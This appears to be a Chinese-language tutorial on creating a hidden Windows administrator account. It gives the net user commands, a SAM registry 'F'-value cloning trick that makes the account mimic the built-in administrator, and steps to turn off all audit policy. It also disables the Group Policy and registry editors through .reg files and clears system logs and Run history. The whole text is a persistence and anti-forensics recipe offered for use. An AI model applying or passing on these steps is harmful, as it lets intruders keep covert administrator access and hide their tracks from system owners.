Windows 下创建隐藏账户

修改账户名密码：
net user admin$ newpwd
1. 命令行下创建隐藏账户
net user admin$ 243988 /add
net localgroup administrators admin$ /add
2. HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
将“admin$”的键值导出为admin$.reg，
同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg，admin.reg
用“记事本”打开admin.reg，将其中“F”值后面的内容复制下来，替换user.reg中的“F”值内容，完成后保存。
3.接下来进入“命令提示符 ”，输入如下指令将我们建立的隐藏账户删除：
net user admin$ /del
4.将admin$.reg和user.reg导入注册表，至此，隐藏账户制作完成。
取消administrator对SAM的权限
5. 修改审核策略
windows设置-本地策略-审核策略
全部设置为-无审核
6 禁用组策略
Windows Registry Editor Version 5.00
[-HKEY_CLASSES_ROOT/CLSID/{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]
恢复：
----------------------------------------------------------------------------------
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT/CLSID/{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]
@="组策略对象编辑器"
[HKEY_CLASSES_ROOT/CLSID/{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}/InProcServer32]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,/
00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,47,00,50,00,/
45,00,64,00,69,00,74,00,2e,00,64,00,6c,00,6c,00,00,00
"ThreadingModel"="Apartment"
----------------------------------------------------------------------------------
7. 禁用注册表
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]
"DisableRegistryTools"=dword:00000002
恢复：
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]
"DisableRegistryTools"=dword:00000000
8. 清理
a.系统日志
b. cclean
c. "运行" 记录: 在"任务栏和「开始」菜单属性→「开始」菜单→自定义→高级"中，按"清除列表"进行清除